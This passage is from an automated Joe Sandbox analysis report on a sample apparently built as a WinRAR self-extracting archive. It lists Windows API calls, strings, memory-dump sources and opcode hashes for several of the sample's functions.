                                                              • Instruction Fuzzy Hash: 81213B72540348AAEF21EEA8CD45FEE7BE8FB05704F140512F920D62A2E675D6588B52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0088AC5A,00000008,?,00000000,?,0088D22D,?,00000000), ref: 00890E85
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0088AC5A,00000008,?,00000000,?,0088D22D,?,00000000), ref: 00890E8F
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0088AC5A,00000008,?,00000000,?,0088D22D,?,00000000), ref: 00890E9F
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 00890EB7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              • Opcode ID: dc404ed10eef913e4aafb6c97c7de8bdc68d9d4b320ac8b66e9f38e7d738159b
                                                              • Instruction ID: 1f0212b869a88d43476c787491a1bf6b6f497d63e30d948c19419330f2c28462
                                                              • Opcode Fuzzy Hash: dc404ed10eef913e4aafb6c97c7de8bdc68d9d4b320ac8b66e9f38e7d738159b
                                                              • Instruction Fuzzy Hash: 4B1173B1A407099FC7216F7A9C849ABFBECFB59744F144C2EF1DAC2201D671A9418F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • EndDialog.USER32(?,00000001), ref: 0089B2BE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0089B2D6
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0089B304
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 445417207-3292211884
                                                              • Opcode ID: f564f02e46e37e605cfc2bf95cd0552ef60307c3a3f2ee4560303ebb8d24721f
                                                              • Instruction ID: 04fc65fd263234b3845670e997e040971dcf79e0296b2609c9491b3b37c28bda
                                                              • Opcode Fuzzy Hash: f564f02e46e37e605cfc2bf95cd0552ef60307c3a3f2ee4560303ebb8d24721f
                                                              • Instruction Fuzzy Hash: C911A532940128B6DF22BBA4AE49FFE376CFF5A710F040021FA45F7280C7A59E459761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              • Opcode ID: d3fd4737267bdb3c0dc7df5e311205d388fad565eaec43987ab40f97017a849f
                                                              • Instruction ID: 3cb52d1cbc53fa74c8eab44ee1dcdbd04c4267b88ac8c0f96e6c4493a7df47dd
                                                              • Opcode Fuzzy Hash: d3fd4737267bdb3c0dc7df5e311205d388fad565eaec43987ab40f97017a849f
                                                              • Instruction Fuzzy Hash: CA017176604349EFDF55AF95FC88E967BB8F709394B080426F906C7231C6319C50DBA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                              • Instruction ID: 5a8a3aeb6c75a2dd34e0395bf7a88b588e76675501a4b4fe6124021852657f18
                                                              • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                              • Instruction Fuzzy Hash: 13A13672A087969FFB21CF18C8817AEBBE5FF52320F1841ADE5C5DBA81D2389941C751
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00887F69,?,?,?), ref: 0088A3FA
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00887F69,?), ref: 0088A43E
                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00887F69,?,?,?,?,?,?,?), ref: 0088A4BF
                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00887F69,?,?,?,?,?,?,?,?,?,?), ref: 0088A4C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              • API String ID: 2287278272-0
                                                              • Opcode ID: caf71bc09f36f3c49614c4cf98f187b99cd4cef52dd7cc8bc38c5ff43b0732d6
                                                              • Instruction ID: d9a6a6221f8c23059245a9c88f10ff03c90c148335f9ade396094d09d1433adb
                                                              • Opcode Fuzzy Hash: caf71bc09f36f3c49614c4cf98f187b99cd4cef52dd7cc8bc38c5ff43b0732d6
                                                              • Instruction Fuzzy Hash: 7F41AF312883819AEB35EF24DC45BAEBBE4FF85700F08091AB5D1D32D1D6A49A48DB53
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID:
                                                              • API String ID: 176396367-0
                                                              • Opcode ID: d67e453a144281de4e3388d73e6410a5ff4d752e55bb1c3d1e5153114dab59ef
                                                              • Instruction ID: 8a851c9a71a141d2bd1787b33e57efc739e31a9d5fe04647b5d9d50cb44b969d
                                                              • Opcode Fuzzy Hash: d67e453a144281de4e3388d73e6410a5ff4d752e55bb1c3d1e5153114dab59ef
                                                              • Instruction Fuzzy Hash: F941B3719006699BCB61EF688C499EE7BBCFF11310F040029F946E7241DF30AE558BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008A91E0,?,00000000,?,00000001,?,?,00000001,008A91E0,?), ref: 008AC9D5
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008ACA5E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008A6CBE,?), ref: 008ACA70
                                                              • __freea.LIBCMT ref: 008ACA79
                                                                • Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: b09f50e0416d1f3c3efbb27f67e4699911b26d12e969e34b303bd6f19c491a9b
                                                              • Instruction ID: bddcff19ebc888f3d3c3715aaab5b91598532b2d7dfe10720eec24c2db0f0e11
                                                              • Opcode Fuzzy Hash: b09f50e0416d1f3c3efbb27f67e4699911b26d12e969e34b303bd6f19c491a9b
                                                              • Instruction Fuzzy Hash: F0318072A0021AABEF25DF68DC45EBF7BA5FB42310B144268FC14E6251EB35ED50CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0089A666
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0089A675
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0089A683
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0089A691
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: 7765de110a9534e2d2d1974b4bd69244cdfc1939b2552d0c470cf89c5d58a1c2
                                                              • Instruction ID: f2ad37eb74783900b6c0af642cea181c2000660a059e48d3529a9ec928be5713
                                                              • Opcode Fuzzy Hash: 7765de110a9534e2d2d1974b4bd69244cdfc1939b2552d0c470cf89c5d58a1c2
                                                              • Instruction Fuzzy Hash: ACE0EC31986F61E7D6A55B60AC4DB8B3E64BB15B52F050111FA05AB190DB748A008BE5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0089A699: GetDC.USER32(00000000), ref: 0089A69D
                                                                • Part of subcall function 0089A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0089A6A8
                                                                • Part of subcall function 0089A699: ReleaseDC.USER32(00000000,00000000), ref: 0089A6B3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0089A83C
                                                                • Part of subcall function 0089AAC9: GetDC.USER32(00000000), ref: 0089AAD2
                                                                • Part of subcall function 0089AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0089AB01
                                                                • Part of subcall function 0089AAC9: ReleaseDC.USER32(00000000,?), ref: 0089AB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: (
                                                              • API String ID: 1061551593-3887548279
                                                              • Opcode ID: 99937418be68e4fe5fa41453ed482ef67dffc5db640e62eef491a5a7c1267f03
                                                              • Instruction ID: fcfeb22b97111245c60a5a21a87506021e8297ba86ed9104f71475746bdd79cf
                                                              • Opcode Fuzzy Hash: 99937418be68e4fe5fa41453ed482ef67dffc5db640e62eef491a5a7c1267f03
                                                              • Instruction Fuzzy Hash: F991F271604355AFDA15DF25C844A2BBBE9FFC9701F04491EF59AD7220DB30A905CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008AB324
                                                                • Part of subcall function 008A9097: IsProcessorFeaturePresent.KERNEL32(00000017,008A9086,00000050,008B3A34,?,0088D710,00000004,008C1030,?,?,008A9093,00000000,00000000,00000000,00000000,00000000), ref: 008A9099
                                                                • Part of subcall function 008A9097: GetCurrentProcess.KERNEL32(C0000417,008B3A34,00000050,008C1030), ref: 008A90BB
                                                                • Part of subcall function 008A9097: TerminateProcess.KERNEL32(00000000), ref: 008A90C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                              • Instruction ID: 5e81850367eb4b16950e648e971fa6e9042ab1988817a4ac7e5b07fd9b22e04f
                                                              • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                              • Instruction Fuzzy Hash: 95516F71E0010AAFEF14DFA8C881AADBBF5FF59314F24816AE854E7741E7759A018B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 008875E3
                                                                • Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0
                                                                • Part of subcall function 0088A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0088A598
                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0088777F
                                                                • Part of subcall function 0088A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A501
                                                                • Part of subcall function 0088A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                              • String ID: :
                                                              • API String ID: 3226429890-336475711
                                                              • Opcode ID: 1624d05b09ae9fc59d0ef36c92c366402c013faf8b98b276460b8ae988a8a5f5
                                                              • Instruction ID: 61c331e97cc0d346f9b1e47b8761276345c670d2277853df025640bf3ef480a7
                                                              • Opcode Fuzzy Hash: 1624d05b09ae9fc59d0ef36c92c366402c013faf8b98b276460b8ae988a8a5f5
                                                              • Instruction Fuzzy Hash: 74416E71804558A9EB25FB68CC55EEEB37CFF51300F1440A6B645E2092EB749F88CF62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: }
                                                              • API String ID: 176396367-4239843852
                                                              • Opcode ID: 220fa160a2b78db68428d525532c9c4dc3aba186434b650ecdf027b7dabd3fc2
                                                              • Instruction ID: 62852977270108e6264634d526f350596b5e9d01a76db6aae42908f15dce3a37
                                                              • Opcode Fuzzy Hash: 220fa160a2b78db68428d525532c9c4dc3aba186434b650ecdf027b7dabd3fc2
                                                              • Instruction Fuzzy Hash: BF21047290430A5ADB31FA68EA45E6AB3DCFF92710F09042AF540C3601FB64DD5883A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0088F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0088F2E4
                                                                • Part of subcall function 0088F2C5: GetProcAddress.KERNEL32(008C81C8,CryptUnprotectMemory), ref: 0088F2F4
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,0088F33E), ref: 0088F3D2
                                                              Strings
                                                              • CryptProtectMemory failed, xrefs: 0088F389
                                                              • CryptUnprotectMemory failed, xrefs: 0088F3CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              • Opcode ID: 64b65865ebd2c2eb52a8eb74a6bd0fb2c1eb814e94c07e065638fb53ae8636ee
                                                              • Instruction ID: 345cbf8f3af18a027ccf9a94afe1d045fe3945e9552564a3b0848906eeee5786
                                                              • Opcode Fuzzy Hash: 64b65865ebd2c2eb52a8eb74a6bd0fb2c1eb814e94c07e065638fb53ae8636ee
                                                              • Instruction Fuzzy Hash: 87112231600629ABDF12BF24DC45A6E3B65FF00760F14412AFD01EB393DB35AE018B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0088B9B8
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 1543624204-3142399695
                                                              • Opcode ID: 9d842161abec6b37061b9cf0d221644ab0e44eafce5a0bd54612bb0a4cfaa0ab
                                                              • Instruction ID: ee32f304b06b75e54df743c889ce5326f9f6a13f490dd963fc6acec5125b3ef3
                                                              • Opcode Fuzzy Hash: 9d842161abec6b37061b9cf0d221644ab0e44eafce5a0bd54612bb0a4cfaa0ab
                                                              • Instruction Fuzzy Hash: 0701F56350032269AA347B398C42D6BBBACFFD2770B40440AF545D6582FB20D85083B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00010000,00891160,?,00000000,00000000), ref: 00891043
                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 0089108A
                                                                • Part of subcall function 00886C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00886C54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                              • String ID: CreateThread failed
                                                              • API String ID: 2655393344-3849766595
                                                              • Opcode ID: 8d329d8f8db0380658a6abee657ffbff3994db3f3f9144aa48be1a9ec856b981
                                                              • Instruction ID: b4cacabd23373716d066290364f254db314d370d6310b114410d36c0d12eebaa
